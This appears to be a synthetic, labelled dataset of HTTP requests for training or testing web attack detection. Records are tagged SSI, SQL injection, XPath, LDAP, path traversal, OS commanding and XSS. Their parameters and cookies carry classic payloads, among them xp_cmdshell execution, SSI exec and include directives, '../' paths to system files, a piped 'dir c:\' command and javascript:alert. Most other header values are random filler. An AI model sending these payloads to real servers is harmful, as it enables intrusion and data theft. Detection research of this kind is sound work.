Content-Location: http://omsmpie.biz/yttWt/5iah/iz2aooho/imLto/e5idveue.tiff
Content-MD5: Q3d3dGFSdG9ydGdlYm9jMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jul 09 02:36:46 CET
Last-Modified: Sat, 17 Apr 10 12:13:14 CET
Host: 159.246.108.253
Connection: Tia0
Accept: */*
Accept-Charset: iso-8859-9, hz-gb-2312;q=0.2, euc-cn;q=0.7, iso-2022-jp
Accept-Encoding: 
Accept-Language: n5hd-efer3am, tPrs-enrsGNn;q=0.7, otf-sibo, turn-n;q=0.6
Cache-Control: no-store
Client-ip: 133.61.102.149
Cookie: aiees=' AND  USER_NAME()='pe;6eetNM=016729;dtwyvmDetiEmL=egcrueetnl1in4teit;eSprkerh=t<Oa%m-fsan 8l=ln;nhu2tTfscxi=729;deohe=fIa84fPMuCHY
Cookie2: $Version="86"
Date: Tue, 10 Apr 07 06:48:21 UTC
ETag: W/"lwFRmIczOjYswJ0UAg"
Expect: 100-continue
From: rlte@rs4T41y.it
If-Modified-Since: Tue, 30 Mar 10 04:07:27 GMT
If-Unmodified-Since: Fri, 01 Jun 07 07:41:41 UTC
If-Match: "2QJtZ65Tso1AA@XJNJdL"
If-None-Match: "LqIwakH4phFYcNfHD"
If-Range: Fri, 25 Mar 05 19:20:30 CET
Max-Forwards: 98
MIME-Version: 2.2
Pragma: i7U='omiew'
Proxy-Authorization: aln6t gslo=lTedse
Authorization: Basic MjU2cmlhdzplZE8xbGU=
Range: 48614-31991
Referer: /iatdmxgt.wmn
TE: deflate;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/9.1 (X11; U; Linux i386 5.7; ie-6r; rv:1.4.3) Gecko/44581198
UA-CPU: MIPS
UA-Disp: 336,722,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 957x8790
Via: 7.7 56.192.107.223:6869, FTP/1.1 www.ssote1au.jpg
Transfer-Encoding: compress
Upgrade: usuiD/4.0, 7hqfn/1.3, ua0l/0.7, ndst/6.3
Warning: 353 www.douan.shtml "yoel8er3" 
X-Forwarded-For: 235.103.6.212
X-Serial-Number: 40137446111101
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

nqracarct9=o&dljinfit=wheret&fdOLnTi8oee3e5d=0455573&o41rZt=2eonnr&cnSyoxu=5uoouje&nrcw=t uim&tperrl4Arftm3eh=855372532&soanifnheX=efatelnfmriNmi&Ohe6kinds3iw=yNoFZt8bPSH&ntlaua=laKQqiUQ-i&jm=nTaoli2ojiat&twtsey4ssulit=zseA3deleteMe&oeBs=logxmlwsOhot6t;gNomdr+t

End - Id: 42741
Start - Id: 40497
class: SSI
GET /0MZ71aHlogdiEchild52/74anscx8ne/emG0NVx73Q9x1_i.dll?tvsr=uhn&lzFX_vPvXA7wp-=enaajpmacNpn1&mes=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&dnottt=aenht HTTP/1.1
Host: 33.158.141.36:33638
Connection: keep-alive
Accept: application/*
Accept-Charset: iso-8859-9, windows-1250, x-mac-cyrillic;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 23.11.134.211
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="148"
Date: Sat, 17 Apr 10 19:34:28 UTC
ETag: W/"tQ..TqsAmpq4am6OZRoc"
Expect: 100-continue
From: wsWpne@sapo.cz
If-Modified-Since: Fri, 09 Apr 10 07:49:50 CET
If-Unmodified-Since: Wed, 20 Jan 10 09:44:46 GMT
If-Match: *
If-None-Match: "bd97IbNty08ArTR508"
If-Range: "yzK9@p82nkS8bPN"
Max-Forwards: 3
MIME-Version: 2.7
Pragma: tse=e8i9oshe
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: qiee is3OjGer=ao7snt
Range: 8620-2,-84982
Referer: /4rlsAla.asp
TE: trailers
Trailer: Warning
User-Agent: LrlClis
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0287x026
Via: FTP/5.8 www.dmne.jpg:30
Transfer-Encoding: compress
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40497
Start - Id: 35573
class: XPathInjection
GET /NLMlPaccess_logWf9U/5oVi4detwcnnvhrtE4nr/tri/hsRf1/iTw/lm/eSA05_NGpYCZgL/eanmpaadd/gLC.jj_R.cgi?6kq3nzrs=235+or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++++1821%3D HTTP/1.1
Host: www.nEueem.de
Connection: keep-alive
Accept: audio/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: u8fe7ui-Llou6;q=0.9, absr7-oaleah, l-ne;q=0.8
Cache-Control: only-if-cached
Date: Fri, 25 Dec 09 01:20:39 UTC
If-Modified-Since: Mon, 23 May 05 22:45:58 GMT
If-Unmodified-Since: Wed, 11 Apr 07 13:44:10 UTC
If-None-Match: "QJK7npHPtAxHOjB"
Referer: /qr2ne/TyynhuI/5syirin.php4
User-Agent: n@Ftkl http://www.n3oe0.com
----: -----------------------------------

null

End - Id: 35573
Start - Id: 41017
class: SqlInjection
POST /qRD/W3eNvdsUInaE0/FeoGuallDbwbijo5r/r5..LmB/tlhnMaee9iwapcrbor/tQ9LL.px8VQ_YU/vv_xomS/s6eBz@tYC2o9bSwi/70JHoF/uTeiesinlorlstllb/a4vt.cgi? HTTP/1.0
Content-Length: 182
Content-Language: a
Content-Encoding: gzip
Content-Location: /tere3/rrdhoq/dsgudnw.cgi
Content-MD5: aDB3bDZic3QwcmpiaDBkbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Jan 09 16:18:33 UTC
Last-Modified: Sat, 09 Jul 05 17:01:25 CET
Host: www.1ave.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.4, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 168.241.203.79
Cookie: eooEso1ro=naJT9Hw@g;duizenc=oadminrv;iossnee=mbpjqc3;netcatqEwindow.open6koVwp-z=5niehtaccesinph-unionP;rOyd00thomopvh=Ti 8ina3n;tH0i=80419565
Cookie2: $Version="131"
Date: Sat, 28 Jun 08 22:12:54 GMT
ETag: "J9oOxUDDW36cel@qM"
Expect: 100-continue
From: eddo4bhd@tahahlyhn9.org
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Fri, 22 Jul 05 11:02:15 GMT
If-Match: "FfuN-_m.xMsKhix"
If-None-Match: *
If-Range: "7Y5IP_-jwtjDSFv"
Max-Forwards: 13
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: stso6 ogso9=thaamu
Authorization: esnih onsrelh6=edcoaa9g
Range: -388
Referer: /3Va5iteb/ckEi8iah.css
TE: deflate
Trailer: Expect
User-Agent: oyweai9wq/5.2.6.3
UA-CPU: x86
UA-Disp: 856,630,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 892x2342
Via: 7.6 www.ilIrsep.jpeg:023, bbLl/8.7 www.e0dr.gif, HTTP/3.0 123.191.207.254
Transfer-Encoding: identity
Upgrade: hsors8/9.8, hzlsn/4.7, rhsgsn/5.0, n1utpo/9.2, wnna/3.1
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 190.76.80.54
X-Serial-Number: 3513776009500054162
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eegn=';EXECmaster.dbo.xp_cmdshell'cmd.exe&hle=6197660&oozseis7fh=463906&h1ielb4ies6i=373&iZCMNifMOZ=]eahrusrm&VSOMi5J=]AeT&cEmN0tnneorou=5728907549&adnjel2lctp=85&Oeei=kuss

End - Id: 41017
Start - Id: 45296
class: PathTransversal
GET /fN7/8toruEwtENeieei2y.jpeg?eAtEy=u%29dropgxp_&vs6tTD_Bf=t..L&sEe1cuvtaie1b=v%40qx6u3Y_W HTTP/1.0
Host: 200.7.7.24
Connection: e9urs
Accept: application/x-tar;q=0.5, application/zip, video/*;q=0.0
Accept-Charset: iso-8859-1;q=0.9
Accept-Encoding: compress;q=0.7
Accept-Language: ../../../WINNT/autoexec.bat
Cache-Control: ryo=tas
Date: Thu, 30 Sep 04 19:59:42 GMT
ETag: "XxaDqCf4_hX-ocoRHGku"
Expect: 100-continue
If-Modified-Since: Sat, 05 Jun 04 23:18:07 UTC
If-Unmodified-Since: Sat, 09 May 09 10:45:35 GMT
If-Match: *
If-None-Match: "q5VQs.XF4hsm18s"
If-Range: "CdSrODDyv7sIfYc"
Max-Forwards: 16
Pragma: fslsl5eH='7A'
Proxy-Authorization: dnhat tciorE=dIorDai
Authorization: NTLM dFJ6aHlpbDJvdnljd3UwdjBlb0VhbzRvdXJ0ZWVscHJlc2x1bg==
Range: 59-5054,-329
Referer: /sdtozb9/t8wmi/gesyba.dll
TE: trailers,gzip,deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 4.9; ur-es; rv:8.1.2) Gecko/20354012
UA-OS: Win95
Via: HTTP/4.4 www.uEckiee.tiff
Transfer-Encoding: gzip
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 45296
Start - Id: 40320
class: SSI
GET /ira4jnci/fex9elh5oawE3en4/ojTSkQlkTVkRhE/bdhteevacrbnlper/ao/wko9pFvsu/RH5VhW/n3ThBCfCHhCa/mtl6jwh5e/W_x1vuhttps_id1.mspx?eibmgiti=uofiihrsle4is95a&t3i0pmqdtw9nhg6=wr&pihntesbset=idltud33&pasnfwsyattineL=c%25&hL7wJhsock_streamk=%5CEj&slcgnd8=ne2etca%7Emotf0in&9nparasn2=+iln%5Dhntitceva7&imbcd=553&1qssytanroaarzo=gHGmPJYGD97&nVcopyhSiG77Zp=lihrtrlipcme&2Lofbetweenbinmimg=baprocessing-instruction&edw=%3C%21--+++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CS0ibh%5C6cfDntsc%5C3n.exe+d%3A%5Ctmosi9rt%5Cwww.totoonll.org%5Cee%5Cdatabase.mdb++%2Fx+++exporttofoxpro%22--%3E HTTP/1.1
Host: 39.123.143.21
Connection: ee4zRaj
Accept: text/*;q=0.3
Accept-Charset: iso-8859-5;q=0.3, x-mac-cyrillic, koi8-r;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: stHsnp-lrtgaeQ3
Cache-Control: no-transform
Client-ip: 239.88.55.52
Cookie: tiu=750371;nsD6lwNeianah7l=eI7K07oO-;hnllomh=evy3;tyaflm5prdr=liio
Cookie2: $Version="373"
Date: Mon, 30 Nov 09 07:49:13 GMT
ETag: W/"BreSvbANyEzg2vf5"
Expect: uesime7x
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Sun, 01 Jun 08 20:26:42 CET
If-Unmodified-Since: Mon, 25 Aug 08 18:34:32 CET
If-Match: *
If-None-Match: "xHAIB7NmFbEA.mi"
If-Range: Sat, 06 Jan 07 11:23:25 CET
Max-Forwards: 27
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: Hocet deilal=6pmh
Range: -2115,0045-233,-51
Referer: http://www.qvwhedqb.net/bpsnahjN/isut/1PyutC/sNfkwo/mHerndu.mpg
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: IrS3etiqnl
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: hsMps/7.4 164.37.184.27
Transfer-Encoding: compress
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40320
Start - Id: 40737
class: SSI
GET /sRootenIEbnjh/hg82/pnitE7b/6Wix_2rp2Z/h@9rCWnzkqeXGOwATxa/txnoueudlrgeaettnq/dMU/unsoeb8ze1o/Hi4/dmlOkp5PO0ce/lVsiSqVIwDnETDe.css?4lp8=Lshor3kdy0zs&ngese0rrirhe=aa HTTP/1.1
Host: www.qfoeh4h.org
Connection: uospRd
Accept: audio/*;q=0.3, video/mpeg;q=0.2
Accept-Charset: hz-gb-2312, iso-8859-8-i;q=0.9, x-mac-arabic, cp-936, euc-jp;q=0.0
Accept-Encoding: identity;q=0.1, deflate;q=0.6, compress;q=0.8, gzip;q=0.0
Accept-Language: SttiuE-eO;q=0.3
Cache-Control: min-fresh=63
Client-ip: 86.79.186.5
Cookie: 0etaruusLsidtm=oea;lahoeoll0t=<!--#odbc     connect="hiole,eboh1,n6nt"    statement="select   *   from    G"-->;rpheamose=8020796;notTtlmhCTne9ah=h6icopyrflikei
Expect: 100-continue
If-Modified-Since: Tue, 22 Jun 04 13:29:50 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Nov 09 08:52:00 GMT
Max-Forwards: 5
Pragma: gsn4ttf=tjRsllit
Proxy-Authorization: Basic ZW5mc3d1aDM6dHJjUw==
Authorization: Basic dHJuc3N0Omlvb28=
Referer: http://www.hldztll.net/oaas1olU/zoo3.asmx
Trailer: Cache-Control
User-Agent: vzhUOeaeenuhlroagim
Upgrade: atz/8.8, daes/7.7
----: -------------------------------------------------

null

End - Id: 40737
Start - Id: 35244
class: SqlInjection
GET /gREyo/6g@zy79U1nd/lssTvl2Air3V/QvA1NK.pl?2kzg8K=ui%3FnlRn2hiOxeeR&tehnmnto=152116111&AEhtDn=%5Bl1s&miaiete=%27+++OR+++++%27aedfi98otb2%27+++LIKE++%27aze%2525&M5i=sstdinv&Z6P7bgsoundTmHdelete=e30Rb&nLea=ttN HTTP/1.0
Host: www.tlaj.biz
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, iso-2022-jp, windows-1254;q=0.5, cp-950;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=106
Client-ip: 150.203.233.233
Cookie: irhwhsou7x=eVnkl;anwsns=s4e;rwougk4Fiie=diia;MsgP=f 3group byc7zxfn7itee:s;swh8ht=28760;2o=nes
Cookie2: $Version="9"
Date: Tue, 24 Apr 07 19:33:33 CET
ETag: W/"jqRyTt_G6V.5opQIoq5"
Expect: 100-continue
From: eanchR@cq4m.gov
If-Modified-Since: Sat, 08 Jan 05 11:57:59 CET
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: "Sl6Hd0k_r0nWJP42AJV@"
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 845
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest response="eeae8717ee1bcC6E21b8c1107187557c"
Authorization: Basic eTZlNDpocmdzSQ==
Range: 233007-
Referer: /finsp7e/9dho/iann/no6t.nsf
TE: gzip;q=0.1,deflate;q=0.7,trailers
Trailer: Warning
User-Agent: 8Eeye5Edrq (s7Njxf.; akrBZG; hQ9ck79Pjz)
UA-CPU: x86
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7374x0863
Via: HTTP/1.6 www.ecnuluah.shtml
Transfer-Encoding: yfqcxb; eikstlig=nie7
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35244
Start - Id: 42884
class: OsCommanding
GET /baYPMa8l1h4_q/5niiind1hr4ilC6ih/ofutraafnmVbrwta4usw.tiff?gq8N8jL-=7882&ew5A23=+ii%7C&lytocr23jeaL=ofzselect%7E&w9ose11E=tZ27Hn&sLias9a3pi=aAt0c+w&ACubErsioiar=50.186.113.121++%7C++dir%2Bc%3A%5C&aoinTnol=eas6soliuWfx5di&CongPLUjI=badocumentsocmd69&z%uJvsY.__select-=udp+oEuet&anaNtlucotebb=29 HTTP/1.0
Host: 26.208.26.145:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-7
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: tsclexi='atht'
Client-ip: 241.68.47.162
Cookie: tottqrih0ceNcie=081784;rrdgo6c=fP5Is;o0ctegtpo=rfsi;lma422losSotrr2=tZC4S.PzH8iM
Cookie2: $Version="443"
Date: Fri, 27 Aug 04 15:43:30 GMT
ETag: "mC@rd8lAtMiE6hU-B"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Sat, 13 Jun 09 14:38:46 CET
If-Unmodified-Since: Wed, 23 Jan 08 13:08:06 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 6.8
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: NTLM b2Fhb1lyYUllaHVlb2V2ZWl1MHVub281ZXFweGJpOGV6ZA==
Referer: /tlhe/nnasoexm.php3
TE: chunked,gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.4 (compatible; MSIE 4.1; Win 9x; joseo9wo)
UA-OS: Win98
UA-Pixels: 4835x5695
Via: HTTP/1.8 www.teoo4rw7.tiff:56, FTP/5.7 41.237.225.35:165
Transfer-Encoding: identity
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344
----: -----------------------------------------------

null

End - Id: 42884
Start - Id: 36877
class: LdapInjection
GET /rtfiYe4re/jdt/htaccesFhmQ7e@/1hammav7ekkweS/Oudsie8cTotejt/-Sphpm6/A34s1JfXq.9.nMo/ehfusmjt7iHas4n/xcd/t6y5f/3nnIziWe3umjkaXvvuz0.gif? HTTP/1.1
Host: 126.136.52.168:80
Connection: keep-alive
Accept: image/jpeg;q=0.0, image/jpeg
Accept-Charset: iso-8859-6;q=0.3, iso-8859-7;q=0.6, windows-1257;q=0.4, x-mac-greek, cp-950
Accept-Encoding: *
Accept-Language: sal-chwe, eiOen-itn, aghni-s7ms;q=0.8, t-es0NEme;q=0.8, n3hnnh-op
Cache-Control: only-if-cached
Client-ip: 55.104.5.22
Cookie: n2i2j=eWSj1@@3tIRN;BXZJc6_kYtb=71850;oneteetneuE=3a1eOlmailiaIht;e4ih27n7=)    (|(tad=26Rts*);V8pVyvjhttps6=688;sngBncuasrn6bo=14125625
Cookie2: $Version="4"
Date: Thu, 01 Jun 06 22:27:12 CET
ETag: "qe6AfZpd-4X.4-V"
Expect: 100-continue
From: sli7nm@n5seOm4e.gov
If-Modified-Since: Tue, 28 Aug 07 15:39:00 GMT
If-Unmodified-Since: Mon, 22 Mar 10 23:08:40 CET
If-Match: "q8DL.4YZI.BvGe5"
If-None-Match: *
If-Range: Thu, 25 Aug 05 20:13:28 CET
Max-Forwards: 2442
MIME-Version: 1.2
Pragma: no-cache
Authorization: Basic ZmlyeGRObjphdWRIdHQ1
Range: -348635
Referer: /en2ast/uc4pas/EceexeiE/wfst.sh
TE: trailers
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 4.0; t8-or; rv:5.4.0) Gecko/04112492
UA-OS: Windows NT
UA-Pixels: 5144x8238
Via: 4.7 www.gmre.html, HTTP/3.1 www.Pfreyq.shtml
Transfer-Encoding: hlnNim; edo93du=rsdI

null

End - Id: 36877
Start - Id: 48121
class: XSS
GET /tJlGijdLqh-X./lx1sea/abArtLsaeh/hyw7S2D.exe?nuks7YshutdownXlnHL=otnwbe1tdew&sbiri=4338&tja2ietn=tn&iseooniimrn=javascript%3Aalert++%28+++++%22+++ot9z.o%22%29&memmoy4r=d3QiC3VO&nMEaToi=e+xterm+Ok+7wp-u&fEyNwawemoev8re=7nvprocessing-instruction6pjzdpassthruew%40+&mr0Msi9ua=enrpniopasnl&oiirrhi=mr%25r&tseeehpmfhospc=andszA HTTP/1.0
Host: 68.97.180.99
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 193.109.62.83
Cookie: Pcur=692;qTsrnS2e=64;tpaRmu=e%3Apw;C%umetaKTDs4=i4liomtrtfO1qfma
Cookie2: $Version="47"
Date: Sat, 19 Mar 05 02:15:34 GMT
ETag: W/"MCOhL0U7dc0.h29B"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Wed, 26 Nov 08 01:58:51 UTC
If-Unmodified-Since: Thu, 21 Jun 07 06:34:24 UTC
If-Match: "WlgHts13DlvSAD08T"
If-None-Match: "05mE4Sccl7Gte2RV"
If-Range: *
Max-Forwards: 302
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: http://www.intc.net/oegcf/uqoo/1ySd/hsVee4r/oaarotp.cgi
TE: trailers,chunked;q=0.1,trailers
Trailer: User-Agent
User-Agent: hu1iasg/5.1.2
UA-CPU: 68000
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 2.0 www.eLgo.html, 3.6 65.53.57.164:4893, 3.0 253.247.158.124:15
Transfer-Encoding: identity
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48121
Start - Id: 45304
class: PathTransversal
GET /abigttdmoamRnn/e8ety4Sbatm/rEd3eoPmBIc3/lczNANQ7CI3g5XzazH/uq8bnzVPJx8Otc54.EvI/Lrk/oducrsmeSslcu/8tgkw8ao86.js?ish0On=sedcVizhcee4u&oDaneeoe=aq4xcNn3&tA=uGo0 HTTP/1.0
Host: 240.30.99.214:4242
Connection: ttees
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: r:\\WINNT\\win.ini
Cookie2: $Version="608"
Date: Fri, 28 Sep 07 21:02:33 CET
Expect: cteeGLmp
Max-Forwards: 384
Pragma: no-cache
Authorization: Digest realm
Referer: http://www.uFcek.gov/meeru/e6hs8e.jsp
User-Agent: Mozilla/0.0 (compatible; nArt5c; Open BSD i586; ustheis3d)
Transfer-Encoding: compress

null

End - Id: 45304
Start - Id: 49466
class: XPathInjection
GET /telnetb/nzoHe4ydlnHeeahiri/g@CE_j%uvvarlA/pwetosaes4gSj.html?ejtgkMlafstn=elp&uhodsisrA9rgeae=s6phnlE%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++++%27rsm%27++%3D++%27&uedn=hXN8Y1t&aOm6eu=ni%27me&_winnt7htaccesCEL=sy HTTP/1.1
Host: www.iitf9ced.cz:80
Connection: sptI
Accept: text/*;q=0.6, application/*
Accept-Charset: cp-950;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=0
Client-ip: 200.92.12.13
Cookie: agn6s=s;0z=n7lvc0;rmonds=184885170;tlufsOh9esee=sotnH1ervo;tsde7iy=t;Kk1nph-4P_H=7
Cookie2: $Version="182"
Date: Wed, 21 Feb 07 13:13:03 UTC
ETag: "SmZqfMrAN90WPwXEG8YZ"
Expect: POes=p4aun;djhEbu=gsoao
From: n5thibdN@srSdAet.st
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Sun, 18 Apr 04 04:20:28 GMT
If-Match: "sZ2xhEON3HrNh@Y"
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 874
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: ledega 1phesBu=nKn6nse
Authorization: Digest uri=http://www.sauLhr.st/um6stglg/w1aaLoe/blons/Tdoty/o9ao60t.jpeg
Range: -012
Referer: /atuesta/4TttetoE/wueAzea/rhwhme/caiii.mdb
TE: trailers
Trailer: Cache-Control
User-Agent: deoeshntee
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 1.1 www.ars68hi.html, 7.1 36.237.244.148, 6.7 90.136.18.23:9475
Transfer-Encoding: deflate
Upgrade: nueei/2.7, enf/8.5
Warning: 106 8.47.235.199 "tntixedcsbLoverdsz8" 
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49466
Start - Id: 40934
class: SSI
GET /tdlm/ztfeOutxraheh9sm/8jetbrsieyMnfonnmtut/xKLTmochaY/qn/vsmIe67s4eahrgdr9if/RebSx/eg8k9fOpQ7OaiWy.js?sjth=%3C%21--+%23odbc++++connect%3D%22RrsmceI%2Ceh%2Cthr%22++++++statement%3D%22select+++*+++++from+++++emiah%22--%3E&Iinclude3R=aTdr HTTP/1.0
Host: www.ettds.uk:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.3, compress, gzip;q=0.2, identity, deflate
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 39.139.56.104
Cookie: drresengndygrn=s;nveo=955111753;59gSoa9Stnksesl=hv2p@mvZ
Cookie2: $Version="268"
Date: Sat, 25 Aug 07 16:54:39 CET
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: 100-continue
From: ioOee@owoeu.be
If-Modified-Since: Thu, 11 Sep 08 02:03:07 UTC
If-Unmodified-Since: Fri, 11 Dec 09 06:25:19 GMT
If-Match: *
If-None-Match: "71_1l-Y9scT6Pu8B"
If-Range: "Wk25p3m.Q@-G9Cz8VcE"
Max-Forwards: 8379
MIME-Version: 0.2
Pragma: neshaEiN=ss
Proxy-Authorization: NTLM b2ZUZW9sbnN3YnBZMHN1Ym9oQmVpZXNlbmQ3ZWl3MGZD
Authorization: NTLM c21lcm51ZTJ0MmV1aU5kc3N0eWtUa2NvbjdzZHNkc29rZWxFdHJk
Range: -25
Referer: http://oK2nmt.uk/alnAe/fjs9n/qtLaei/yjkn5h3i.pl
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.6 (X11; U; Solaris 5.7; ut-gn; rv:1.9.1) Gecko/75235226
UA-CPU: 68000
UA-Disp: 661,5118,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4871x5124
Via: HTTP/4.1 www.ptNetzt.css:4, HTTP/8.6 74.94.178.154
Transfer-Encoding: ainu; Naowi7=1iAw
Upgrade: sade/0.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40934
Start - Id: 46249
class: PathTransversal
GET /b2nomsoutceEerteeNbw.jsp?ewt=ibiuiRceNobjecte&hkA=70&Cndtnan8oaut=rdhxusr1yiohegaewe&hAndhe=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&fIHA10=63195&telnRejeo=hai6e%3CrH9wsc&rd=imgmPriicatfromachildCtlink%2Besphp4copyo&yrfaaBewh0oiieh=535&ndgrttakoetoe2a=3&2sssztliaer6rm=sehurc&tYdeiuctanM=%40ceo&0inDeMF=48603067&liigsstas=spevaso3dD HTTP/1.0
Host: www.ifitx0er.com
Connection: close
Accept: */*
Accept-Charset: shift_jis
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 207.164.142.103
Cookie: 0eHbnE7o6=olphpreieimg
Cookie2: $Version="772"
Date: Wed, 17 Aug 05 05:43:01 GMT
ETag: "N7Ppg6kTnN1vCFx0Lc"
Expect: salf=glfs9od
From: iervv@usohuics.gov
If-Modified-Since: Tue, 12 Apr 05 08:13:01 UTC
If-Unmodified-Since: Tue, 19 Apr 05 13:35:03 UTC
If-Match: "HLXMtC0SFhJ_0vM"
If-None-Match: "QeK9EsS8kgnHixgR"
If-Range: "QpC6NCb43Hnxt7j3"
Max-Forwards: 4037
MIME-Version: 9.7
Pragma: atmiwt='ttE'
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: Basic dG9tYzphaG52
Range: 5263-
Referer: http://paerEht.be/ohaci/dd2l/v2gu2/6Oxre/7soreotz.png
TE: deflate;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: 2rd5ra
UA-CPU: 68000
UA-Disp: 601,9134,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0134x6320
Via: 3.8 www.heP5.jpeg
Transfer-Encoding: deflate
Upgrade: tk5t/9.1
Warning: 233 www.yens9.gif "cesksyo" 
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------------------------------
